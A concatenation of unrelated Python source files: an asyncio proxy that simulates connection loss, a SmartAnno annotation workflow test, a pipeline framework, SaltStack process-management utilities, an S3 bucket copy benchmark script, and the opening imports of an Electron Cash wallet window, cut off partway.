self.proxy._close_connection(self)
async def handle(self):
self.proxy_to_backend_task = asyncio.ensure_future(
self.proxy_to_backend())
self.proxy_from_backend_task = asyncio.ensure_future(
self.proxy_from_backend())
try:
await asyncio.wait(
[self.proxy_to_backend_task, self.proxy_from_backend_task],
return_when=asyncio.FIRST_COMPLETED)
finally:
# Asyncio fails to properly remove the readers and writers
# when the task doing recv() or send() is cancelled, so
# we must remove the readers and writers manually before
# closing the sockets.
self.loop.remove_reader(self.client_sock.fileno())
self.loop.remove_writer(self.client_sock.fileno())
self.loop.remove_reader(self.backend_sock.fileno())
self.loop.remove_writer(self.backend_sock.fileno())
self.client_sock.close()
self.backend_sock.close()
async def _read(self, sock, n):
read_task = asyncio.ensure_future(
self.loop.sock_recv(sock, n))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[read_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return read_task.result()
finally:
if not read_task.done():
read_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def _write(self, sock, data):
write_task = asyncio.ensure_future(
self.loop.sock_sendall(sock, data))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[write_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return write_task.result()
finally:
if not write_task.done():
write_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def proxy_to_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.client_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.backend_sock, data)
except ConnectionError:
pass
finally:
self.loop.call_soon(self.close)
async def proxy_from_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.backend_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.client_sock, data)
except ConnectionError:
pass
finally:
self.loop.call_soon(self.close)
|
TestKeywordEmbeddingExtender.py
|
import logging
import sqlalchemy_dao
from sqlalchemy_dao import Dao
from SmartAnno.utils.ConfigReader import ConfigReader
from SmartAnno.db.ORMs import Filter
from SmartAnno.gui.Workflow import Workflow
from SmartAnno.utils.AnnotationTypeDef import AnnotationTypeDef
from SmartAnno.utils.KeywordsFiltering import KeywordsFiltering
from SmartAnno.utils.KeywordsEmbeddingExtender import KeywordsEmbeddingExtender
from SmartAnno.utils.KeywordsEmbeddingExtenderSetup import KeywordsEmbeddingExtenderSetup
logging.getLogger().setLevel(logging.DEBUG)
ConfigReader('../conf/smartanno_conf.json')
from SmartAnno.models.GloveModel import GloveModel
from threading import Thread
def prepareGloveModel():
ConfigReader('../conf/smartanno_conf.json')
glove_path = ConfigReader.getValue('glove/model_path')
glove_vocab = ConfigReader.getValue('glove/vocab')
glove_vector = ConfigReader.getValue('glove/vector')
GloveModel(word2vec_file=glove_path, vocab=glove_vocab, vect=glove_vector)
gm = GloveModel.glove_model
thread_gm = Thread(target=prepareGloveModel)
thread_gm.start()
wf = Workflow(config_file=ConfigReader.config_file)
wf.api_key = ConfigReader.getValue("api_key")
wf.dao = Dao('sqlite+pysqlite:///../data/test.sqlite', sqlalchemy_dao.POOL_DISABLED)
wf.task_name = 'language'
wf.append(AnnotationTypeDef(
'<h3>Annotation types:</h3><p>List all the types you want to identify below. Each type per line.<br/>If you'
'have too many types, try set up them separately, so that you won't need to choose from a long list '
'for each sample. </p>', name='types'))
wf.append(KeywordsFiltering(
name='keywords'))
wf.append(KeywordsEmbeddingExtenderSetup(name='w_e_extender_setup'))
wf.append(KeywordsEmbeddingExtender(name='w_e_extender', max_query=40))
wf.start()
wf.steps[0].complete()
with wf.dao.create_session() as session:
records = session.query(Filter).filter(Filter.task_id == wf.task_id) \
.filter(Filter.type_name == 'Eng')
record = records.first()
record.keyword = 'Eng\nEnglish'
wf.steps[1].complete()
|
pipeline.py
|
from utils.functions import current_time_millis, overrides, get_class_name, deprecated
from threading import Thread
import logging
import numpy as np
from config.config import *
class Pipeline(object):
""" Base object for all pipelines"""
def __init__(self):
self.execute_callbacks = []
self._debug_prefix = ""
self.__succ = False
self.__output = None
def reset_pipeline(self):
self.__succ = False
self.__output = None
@property
def output(self):
return self.__output
@property
def result(self):
return self.success_state, self.output
@property
def debug_prefix(self):
return self._debug_prefix
@property
def success_state(self):
return self.__succ
@debug_prefix.setter
def debug_prefix(self, value):
self._debug_prefix = value
def run_pipeline(self, inp):
self.reset_pipeline()
start = current_time_millis()
succ, out = self._execute(inp)
exectime = current_time_millis() - start
start = current_time_millis()
for cb in self.execute_callbacks:
cb(inp, out)
callbacktime = current_time_millis() - start
logging.debug(self.debug_prefix + "Executing pipeline {} took {}ms (callbacktime: {}ms)".format(
self.__class__.__name__, exectime, callbacktime))
self.__succ = succ
self.__output = out
return out
def _execute(self, inp):
raise NotImplementedError()
def __str__(self):
return "[{}]".format(get_class_name(self))
class CompositePipeline(Pipeline):
def __init__(self, *pipelines):
Pipeline.__init__(self)
self.named_pipelines = {}
self.__pipelines = []
for p in pipelines:
if issubclass(type(p), CompositePipeline): # element is a composite pipeline
self.named_pipelines.update(p.named_pipelines)
self.__pipelines.append(p)
elif issubclass(type(p), Pipeline): # element is a pipeline, but NOT a composite pipeline
self.__pipelines.append(p)
elif type(p) == tuple:
name = p[0]
# check type of first element
if issubclass(type(p[1]), CompositePipeline):
self.named_pipelines.update(p[1].named_pipeline)
toappend = p[1]
elif issubclass(type(p[1]), Pipeline):
toappend = p[1]
else:
toappend = AtomicFunctionPipeline(p[1])
if name in self.named_pipelines:
logging.warning("Name '{}' already exists in the CompositePipeline".format(name))
self.named_pipelines[name] = toappend
self.__pipelines.append(toappend)
else:
self.__pipelines.append(AtomicFunctionPipeline(p))
self._results = None
self.debug_prefix = ""
@overrides(Pipeline)
def reset_pipeline(self):
Pipeline.reset_pipeline(self)
for p in self.pipelines:
p.reset_pipeline()
@property
def debug_prefix(self):
return self._debug_prefix
@debug_prefix.setter
def debug_prefix(self, value):
self._debug_prefix = value
for s in self.pipelines:
s.debug_prefix = self.debug_prefix + " "
@property
def pipelines(self):
return self.__pipelines
@property
def results(self):
return self._results
def _execute(self, inp):
raise NotImplementedError()
def __getitem__(self, key):
if type(key) == int:
return self.pipelines[key]
elif type(key) == str:
return self.named_pipelines[key]
else:
raise TypeError()
class EmptyPipeline(Pipeline):
""" A pipeline that does nothing."""
@overrides(Pipeline)
def _execute(self, inp):
return True, inp
class PipelineSequence(CompositePipeline):
""" Chains several pipelines and executes them sequentially"""
def __init__(self, *pipelines):
CompositePipeline.__init__(self, *pipelines)
@overrides(CompositePipeline)
def _execute(self, inp):
self._results = [(True, inp)]
last = inp
run = True
for pipeline in self.pipelines:
if not run: # halt the pipeline if one step is not successfull
self._results.append((False, None))
else:
last = pipeline.run_pipeline(last)
run = pipeline.success_state
self._results.append((run, last))
return run, last
def __str__(self):
return "[PipelineSequence|{} steps: {}]".format(len(self.pipelines), '->'.join(str(p) for p in self.pipelines))
class AbstractParallelPipeline(CompositePipeline):
def __init__(self, *pipelines):
CompositePipeline.__init__(self, *pipelines)
self.use_parallel = USE_TRUE_PARALLEL_PIPELINES
@overrides(CompositePipeline)
def _execute(self, inp):
return self._execute_parallel(inp) if self.use_parallel else self._execute_parallel(inp)
def _execute_sequential(self, inp):
results = []
for pipeline in self.pipelines:
out = pipeline.run_pipeline(inp)
succ = pipeline.success_state
results.append((succ, out))
out = self.combine_outputs([p.output for p in self.pipelines])
succ = self.combine_success([p.success_state for p in self.pipelines])
return out, succ
def _execute_parallel(self, inp):
threads = [Thread(target=p.run_pipeline, args=(inp,)) for p in self.pipelines]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
out = self.combine_outputs([p.output for p in self.pipelines])
succ = self.combine_success([p.success_state for p in self.pipelines])
return succ, out
def combine_outputs(self, outputs):
raise NotImplementedError()
def combine_success(self, successes):
raise NotImplementedError()
class ConjunctiveParallelPipeline(AbstractParallelPipeline):
"""
Runs several pipelines in parallel and then combines their output.
The result is a tuple that contains the success flag, which is true, if all
pipelines were successfull. The second component is a tuple containing
the result tuples of the parallel pipelines.
"""
def __init__(self, *pipelines):
AbstractParallelPipeline.__init__(self, *pipelines)
@overrides(AbstractParallelPipeline)
def combine_outputs(self, outputs):
return tuple(outputs)
@overrides(AbstractParallelPipeline)
def combine_success(self, successes):
return np.all(successes)
def __str__(self):
return "[ConjunctiveParallelPipeline|{} pipelines: {}]".format(
len(self.pipelines), '||'.join(str(p) for p in self.pipelines))
class DisjunctiveParallelPipeline(AbstractParallelPipeline):
"""
Runs several pipelines in parallel and then combines their output.
The result is a tuple that contains the success flag, which is true, if at
least one pipelines was successfull. The second component is a tuple
containing the result tuples of the parallel pipelines.
"""
def __init__(self, *pipelines):
AbstractParallelPipeline.__init__(self, *pipelines)
@overrides(AbstractParallelPipeline)
def combine_outputs(self, outputs):
return tuple(outputs)
@overrides(AbstractParallelPipeline)
def combine_success(self, successes):
return np.any(successes)
def __str__(self):
return "[ConjunctiveParallelPipeline|{} pipelines: {}]".format(
len(self.pipelines), '||'.join(str(p) for p in self.pipelines))
class AtomicFunctionPipeline(Pipeline):
""" A wrapper class that just executes a given funtion """
def __init__(self, func):
Pipeline.__init__(self)
self.__func = func
@overrides(Pipeline)
def _execute(self, inp):
return True, self.__func(inp)
def __str__(self):
return '[AtomicFunctionPipeline|function=' + self.__func.__name__ + ']'
class ConstantPipeline(Pipeline):
""" A wrapper class that just returns the parameter passed in the
constructor. This can be used as an entry point for a pipeline."""
def __init__(self, const):
Pipeline.__init__(self)
self.__const = const
@overrides(Pipeline)
def _execute(self, inp):
""" Ignores the input and returns the object passed in the
constructor"""
return True, self.__const
def __str__(self):
return "[ConstantPipeline|const=" + str(self.__const) + "]"
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import sys
import time
import types
import signal
import subprocess
import logging
import multiprocessing
import multiprocessing.util
import threading
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
process.start()
# create a nicer name for the debug log
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}.{1}.{2}'.format(
tgt.__module__,
tgt.__class__,
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
while True:
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows():
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
else:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != 3:
raise
del self._process_map[pid]
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __init__(self, *args, **kwargs):
self.log_queue = kwargs.pop('log_queue', salt.log.setup.get_multiprocessing_logging_queue())
multiprocessing.util.register_after_fork(self, MultiprocessingProcess.__setup_process_logging)
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
|
s3cp.py
|
#!/usr/bin/env python
# S3 Operation Examples
import argparse
import random
import sys
import string
import time
import uuid
import Queue
import threading
import boto3
import boto3.session
import botocore
from collections import defaultdict
from datetime import datetime
from cStringIO import StringIO
# Utilities
VERBOSE_INFO = 0
VERBOSE_DEBUG = 1
VERBOSE_TRACE = 2
VERBOSE_LEVEL = VERBOSE_INFO
def fatal(message=''):
if message:
sys.stderr.write('fatal: %s\n' % message)
sys.stderr.flush()
sys.exit(1)
def warning(message):
sys.stderr.write('warning: %s\n' % message)
sys.stderr.flush()
def info(message):
if VERBOSE_LEVEL >= VERBOSE_INFO:
sys.stderr.write('info: %s\n' % message)
sys.stderr.flush()
def debug(message):
if VERBOSE_LEVEL >= VERBOSE_DEBUG:
sys.stderr.write('debug: %s\n' % message)
sys.stderr.flush()
def trace(message):
if VERBOSE_LEVEL >= VERBOSE_TRACE:
sys.stderr.write('trace: %s\n' % message)
sys.stderr.flush()
def human2bytes(size):
num = int(size.strip('KMGB'))
if size.upper().endswith('KB'): return num * 1024
elif size.upper().endswith('MB'): return num * (1024 ** 2)
elif size.upper().endswith('GB'): return num * (1024 ** 3)
else:
fatal('unknown value: %s' % size)
def bytes2human(num, round2int=False):
format_str = '%.3f%s'
if round2int: format_str = '%d%s'
for unit in ['B', 'KB', 'MB', 'GB', 'TB', 'PB']:
if abs(num) < 1024.0:
return format_str % (num, unit)
num /= 1024.0
return format_str % (num, 'EB')
timer = time.clock if sys.platform == 'win32' else time.time
_elapased = 0.0
def timing_start():
global _elapsed
_elapsed = timer()
def timing_stop(message=''):
global _elapsed
_elapsed = timer() - _elapsed
if message:
info('%s: %.3f seconds' % (message, _elapsed))
# Parse argument
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--objects-number', type=int,
dest='objects_nums', default=10, help='number of objects')
parser.add_argument('-s', '--objects-size', type=str,
dest='object_size', default='1MB',
help='objects size in bytes, KB, MB, or GB')
parser.add_argument('-t', '--threads-num', type=int,
default=1, help='number of concurrent threads')
parser.add_argument('-o', '--optimal', action='store_true',
default=False, help='optimal transfer using low-level control')
parser.add_argument('-x', '--max-concurrency', type=int,
default=32, help='maximum concurrency')
parser.add_argument('-d', '--dryrun', help="dry run, nothing will be executed",
action="store_true")
parser.add_argument('-v', "--verbose", metavar='INT', type=int,
default=VERBOSE_LEVEL, help="output verbosity")
parser.add_argument("--clean", dest='clean', action='store_true',
default=False, help="clean and remove buckets")
args = parser.parse_args()
VERBOSE_LEVEL = args.verbose
object_size = human2bytes(args.object_size)
# Get AWS account Information
session = boto3.session.Session()
iam_client = boto3.client('iam')
s3_client = boto3.client('s3')
aws_user_id = iam_client.list_users()['Users'][0]['UserId'] # HOWTO: get user id
aws_region = session.region_name # HOWTO: get profile region
debug('AWS user ID: %s' % aws_user_id)
debug('AWS region: %s' % aws_region)
# Prepare buckets
bucket_name_prefix = ("s3cp-%s-%s" % (\
aws_user_id[0:8],
datetime.now().strftime('%y%m%d'))).lower() # NOTE: bucket name must be lower case
s3 = boto3.resource('s3')
src_bucket = s3.Bucket(bucket_name_prefix + '-from')
dst_bucket = s3.Bucket(bucket_name_prefix + '-to')
debug('source bucket: %s' % src_bucket.name)
debug('destination bucket: %s' % dst_bucket.name)
# Empty and delete buckets
if args.clean:
timing_start()
deleted_objects = 0
for bucket in [src_bucket, dst_bucket]:
try:
for key in bucket.objects.all(): # HOWTO: get all objects
trace('delete object: %s/%s' % (key.bucket_name, key.key))
if not args.dryrun:
key.delete()
deleted_objects += 1
trace('delete bucket: %s' % bucket.name)
if not args.dryrun: bucket.delete()
except botocore.exceptions.ClientError as e:
# HOWTO: catch boto exceptions
if e.response['Error']['Code'] == 'NoSuchBucket':
warning('bucket s3://%s does not exist' % bucket.name)
else:
raise
timing_stop('deleted %d objects' % deleted_objects)
sys.exit(0)
# Create buckets
if not args.dryrun:
timing_start()
for bucket in [src_bucket, dst_bucket]:
try:
bucket.create( # HOWTO: create bucket
CreateBucketConfiguration = {'LocationConstraint': 'us-west-2'},
)
except botocore.exceptions.ClientError as e:
# HOWTO: catch boto exceptions
if e.response['Error']['Code'] == 'BucketAlreadyOwnedByYou':
warning('bucket s3://%s has been created' % bucket.name)
else:
raise
timing_stop('create buckets')
# Create objects
tasks = Queue.Queue(args.threads_num * 2)
def create_objects_by_thread(thread_id):
# HOWTO: each thread should have its own session
# http://boto3.readthedocs.io/en/latest/guide/resources.html#multithreading
session = boto3.session.Session()
if args.optimal:
# HOWTO: low-level control
# http://boto3.readthedocs.io/en/latest/_modules/boto3/s3/transfer.html
client_config = botocore.config.Config(
max_pool_connections=args.max_concurrency)
transfer_config = boto3.s3.transfer.TransferConfig(
multipart_threshold=8 * 1024 * 1024,
multipart_chunksize=8 * 1024 * 1024,
max_concurrency=args.max_concurrency,
num_download_attempts=5,
max_io_queue=100,
io_chunksize=256 * 1024)
client = session.client('s3', config=client_config)
else:
s3 = session.resource('s3')
while True:
key = tasks.get()
content = StringIO('*' * object_size)
trace('thread %d create object: s3://%s/%s' % \
(thread_id, src_bucket.name, key))
if not args.dryrun:
if args.optimal:
client.upload_fileobj(content, src_bucket.name, key,
Config=transfer_config)
else:
obj = s3.Object(src_bucket.name, key)
obj.upload_fileobj(content)
tasks.task_done()
timing_start()
for i in xrange(args.threads_num):
t = threading.Thread(target=create_objects_by_thread, args=(i,))
t.daemon = True
t.start()
for i in xrange(args.objects_nums):
# HOWTO: construct a well distributed key
key = '%s-%s-%d.s3cp' % (
uuid.uuid3(uuid.NAMESPACE_DNS,
(str(99999999 - i) + args.object_size).encode()).hex,
args.object_size, i)
tasks.put(key)
tasks.join()
timing_stop('created %d objects by %d threads' % (args.objects_nums, args.threads_num))
# Copy objects
#with tasks.mutex: tasks.queue.clear()
tasks = Queue.Queue(args.threads_num * 2)
copied_objects = [0] * args.threads_num
def copy_objects_by_thread(thread_id, copied_objects):
# HOWTO: each thread should have its own session
# http://boto3.readthedocs.io/en/latest/guide/resources.html#multithreading
session = boto3.session.Session()
if args.optimal:
# HOWTO: low-level control
# http://boto3.readthedocs.io/en/latest/_modules/boto3/s3/transfer.html
client_config = botocore.config.Config(
max_pool_connections=args.max_concurrency)
transfer_config = boto3.s3.transfer.TransferConfig(
multipart_threshold=8 * 1024 * 1024,
multipart_chunksize=8 * 1024 * 1024,
max_concurrency=args.max_concurrency,
num_download_attempts=5,
max_io_queue=100,
io_chunksize=256 * 1024)
client = session.client('s3', config=client_config)
else:
s3 = session.resource('s3')
client = session.client('s3')
count = 0
while True:
prefix = tasks.get()
# HOWTO: list objects
response = s3_client.list_objects_v2(
Bucket=src_bucket.name,
Prefix=prefix) # Important: using prefix to limit listing
for content in response['Contents']:
key = content['Key']
trace('thread %d copy object: s3://%s/%s' % \
(thread_id, src_bucket.name, key))
if not args.dryrun:
if args.optimal:
client.copy(
CopySource={'Bucket': src_bucket.name, 'Key': key},
Bucket=dst_bucket.name, Key=key,
Config=transfer_config)
else:
obj = s3.Object(dst_bucket.name, key)
obj.copy_from(
CopySource={'Bucket': src_bucket.name, 'Key': key},
)
count += 1
copied_objects[thread_id] = count
tasks.task_done()
timing_start()
existing_prefixes = []
for prefix in string.ascii_lowercase + string.digits:
# HOWTO: use prefix to restrict listing objects
response = s3_client.list_objects_v2(
Bucket=src_bucket.name,
Prefix=prefix, # important: only list object with specific prefix
MaxKeys=1) # NOTE: MaxKeys=1 since we only test object existence
if response['KeyCount'] > 0:
existing_prefixes.append(prefix)
debug('existing prefixes: %s' % existing_prefixes)
for i in xrange(args.threads_num):
t = threading.Thread(target=copy_objects_by_thread, args=(i, copied_objects))
t.daemon = True
t.start()
for prefix in existing_prefixes:
tasks.put(prefix)
tasks.join()
for i in xrange(args.threads_num):
info('thread %d copied %d objects' % (i, copied_objects[i]))
timing_stop('copied %d objects by %d threads' % (sum(copied_objects), args.threads_num))
|
main_window.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import sys, time, threading
import os, json, traceback
import shutil
import csv
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
import base64
from functools import partial
from collections import OrderedDict
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, format_satoshis_plain_nofloat,
NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee,
UserCancelled, InvalidPassword, bh2u, bfh,
format_fee_satoshis, Weak, print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel, PopupWidget
from .util import *
import electroncash.slp as slp
from electroncash.slp_coinchooser import SlpCoinChooser
from electroncash.slp_checker import SlpTransactionChecker
from .amountedit import SLPAmountEdit
from electroncash.util import format_satoshis_nofloat
from .slp_create_token_genesis_dialog import SlpCreateTokenGenesisDialog
from .bfp_download_file_dialog import BfpDownloadFileDialog
from .bfp_upload_file_dialog import BitcoinFilesUploadDialog
try:
# pre-load QtMultimedia at app start, if possible
